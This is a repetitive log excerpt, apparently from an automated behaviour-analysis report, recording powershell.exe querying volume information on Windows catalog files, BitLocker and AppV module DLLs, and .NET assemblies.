Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
